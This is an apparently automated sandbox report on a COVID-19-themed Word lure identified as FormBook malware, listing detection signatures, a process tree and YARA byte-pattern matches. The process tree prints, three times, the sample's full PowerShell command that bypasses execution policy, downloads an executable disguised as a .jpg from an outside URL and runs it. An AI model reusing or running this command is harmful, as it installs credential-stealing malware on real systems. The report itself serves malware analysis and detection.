
Analysis Report COVID-19 FUNDING ELIGIBILITY FORM.doc

Overview

General Information

Sample Name: COVID-19 FUNDING ELIGIBILITY FORM.doc
MD5: 97c74a10726fd4981d3203de43dcc2a2
SHA1: 432da6985222f9ace31eb15b2bef03d56f4df846
SHA256: 1b410bc2457fe408e14aa1d0770feb9d2c2d59c0546118aad108071cf57c45ca
Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Sigma detected: Powershell download and execute file
Yara detected FormBook
.NET source code contains very large array initializations
Bypasses PowerShell execution policy
Document exploit detected (process start blacklist hit)
Found suspicious RTF objects
Hides that the sample has been downloaded from the Internet (zone.identifier)
Injects files into Windows application
Machine Learning detection for dropped file
Microsoft Office creates scripting files
Office process drops PE file
Powershell drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Suspicious powershell command line found
Tries to download and execute files (via powershell)
Adds / modifies Windows certificates
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains executable resources (Code or Archives)
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Exploit for CVE-2017-0261
Sigma detected: PowerShell Download from URL
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara signature match

Classification

Startup

  • System is w7
  • WINWORD.EXE (PID: 3804 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 5D798FF0BE2A8970D932568068ACFD9D)
    • powershell.exe (PID: 3936 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httPs://u.teknik.io/9Pnzw.jpg','C:\Users\user\AppData\Roaming\COGRANT.exe');Start-Process 'C:\Users\user\AppData\Roaming\COGRANT.exe'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • COGRANT.exe (PID: 1968 cmdline: 'C:\Users\user\AppData\Roaming\COGRANT.exe' MD5: 7AFD0EF7DA1C3D93B5FAAFEB89FFAA15)
    • powershell.exe (PID: 3952 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httPs://u.teknik.io/9Pnzw.jpg','C:\Users\user\AppData\Roaming\COGRANT.exe');Start-Process 'C:\Users\user\AppData\Roaming\COGRANT.exe'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
    • FLTLDR.EXE (PID: 3980 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT MD5: 92E7D4655C629754D2366E67E68A32F9)
    • powershell.exe (PID: 2160 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httPs://u.teknik.io/9Pnzw.jpg','C:\Users\user\AppData\Roaming\COGRANT.exe');Start-Process 'C:\Users\user\AppData\Roaming\COGRANT.exe'' MD5: 92F44E405DB16AC55D97E3BFE3B132FA)
      • COGRANT.exe (PID: 2196 cmdline: 'C:\Users\user\AppData\Roaming\COGRANT.exe' MD5: 7AFD0EF7DA1C3D93B5FAAFEB89FFAA15)
    • verclsid.exe (PID: 2280 cmdline: 'C:\Windows\system32\verclsid.exe' /S /C {06290BD2-48AA-11D2-8432-006008C3FBFC} /I {00000112-0000-0000-C000-000000000046} /X 0x5 MD5: 42B2A7CBD7838214EECE6B6455C34BC6)
    • notepad.exe (PID: 2312 cmdline: 'C:\Windows\system32\NOTEPAD.EXE' 'C:\Users\user\AppData\Local\Temp\Abctfhghghghgh .scT' MD5: A4F6DF0E33E644E802C8798ED94D80EA)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source: C:\Users\user\AppData\Roaming\COGRANT.exe
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: C:\Users\user\AppData\Roaming\COGRANT.exe
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x640cd:$sqlite3step: 68 34 1C 7B E1
  • 0x641fa:$sqlite3step: 68 34 1C 7B E1
  • 0x64199:$sqlite3text: 68 38 2A 90 C5
  • 0x64c9b:$sqlite3text: 68 38 2A 90 C5
  • 0x641ac:$sqlite3blob: 68 53 D8 7F 8C
  • 0x64cb1:$sqlite3blob: 68 53 D8 7F 8C

Source: C:\Users\user\AppData\Roaming\COGRANT.exe
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x49082:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x49328:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x5ee2b:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x5e71a:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x5f90a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x5f7b2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x5d03e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x4c84a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x68f56:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x6a3a0:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KW1NULI9\9Pnzw[1].jpg
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\KW1NULI9\9Pnzw[1].jpg
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x640cd:$sqlite3step: 68 34 1C 7B E1
  • 0x641fa:$sqlite3step: 68 34 1C 7B E1
  • 0x64199:$sqlite3text: 68 38 2A 90 C5
  • 0x64c9b:$sqlite3text: 68 38 2A 90 C5
  • 0x641ac:$sqlite3blob: 68 53 D8 7F 8C
  • 0x64cb1:$sqlite3blob: 68 53 D8 7F 8C

(1 additional entry not shown)

Memory Dumps

Source: 00000007.00000002.709409227.010A2000.00000020.00020000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 00000007.00000002.709409227.010A2000.00000020.00020000.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x63ecd:$sqlite3step: 68 34 1C 7B E1
  • 0x63ffa:$sqlite3step: 68 34 1C 7B E1
  • 0x63f99:$sqlite3text: 68 38 2A 90 C5
  • 0x64a9b:$sqlite3text: 68 38 2A 90 C5
  • 0x63fac:$sqlite3blob: 68 53 D8 7F 8C
  • 0x64ab1:$sqlite3blob: 68 53 D8 7F 8C

Source: 00000007.00000002.709409227.010A2000.00000020.00020000.sdmp
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x48e82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x49128:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x5ec2b:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x5e51a:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x5f70a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x5f5b2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x5ce3e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x4c64a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x68d56:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x6a1a0:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 0000000A.00000002.708480545.010A2000.00000020.00020000.sdmp
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 0000000A.00000002.708480545.010A2000.00000020.00020000.sdmp
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x63ecd:$sqlite3step: 68 34 1C 7B E1
  • 0x63ffa:$sqlite3step: 68 34 1C 7B E1
  • 0x63f99:$sqlite3text: 68 38 2A 90 C5
  • 0x64a9b:$sqlite3text: 68 38 2A 90 C5
  • 0x63fac:$sqlite3blob: 68 53 D8 7F 8C
  • 0x64ab1:$sqlite3blob: 68 53 D8 7F 8C

(7 additional entries not shown)

Unpacked PEs

Source: 7.0.COGRANT.exe.10a0000.0.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 7.0.COGRANT.exe.10a0000.0.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x640cd:$sqlite3step: 68 34 1C 7B E1
  • 0x641fa:$sqlite3step: 68 34 1C 7B E1
  • 0x64199:$sqlite3text: 68 38 2A 90 C5
  • 0x64c9b:$sqlite3text: 68 38 2A 90 C5
  • 0x641ac:$sqlite3blob: 68 53 D8 7F 8C
  • 0x64cb1:$sqlite3blob: 68 53 D8 7F 8C

Source: 7.0.COGRANT.exe.10a0000.0.unpack
Rule: Formbook_1
Description: autogenerated rule brought to you by yara-signator
Author: Felix Bilstein - yara-signator at cocacoding dot com
Strings:
  • 0x49082:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x49328:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x5ee2b:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x5e71a:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x5f90a:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x5f7b2:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x5d03e:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x4c84a:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x68f56:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x6a3a0:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00

Source: 10.0.COGRANT.exe.10a0000.0.unpack
Rule: JoeSecurity_FormBook
Description: Yara detected FormBook
Author: Joe Security

Source: 10.0.COGRANT.exe.10a0000.0.unpack
Rule: Formbook
Description: detect Formbook in memory
Author: JPCERT/CC Incident Response Group
Strings:
  • 0x640cd:$sqlite3step: 68 34 1C 7B E1
  • 0x641fa:$sqlite3step: 68 34 1C 7B E1
  • 0x64199:$sqlite3text: 68 38 2A 90 C5
  • 0x64c9b:$sqlite3text: 68 38 2A 90 C5
  • 0x641ac:$sqlite3blob: 68 53 D8 7F 8C
  • 0x64cb1:$sqlite3blob: 68 53 D8 7F 8C

(7 additional entries not shown)

Sigma Overview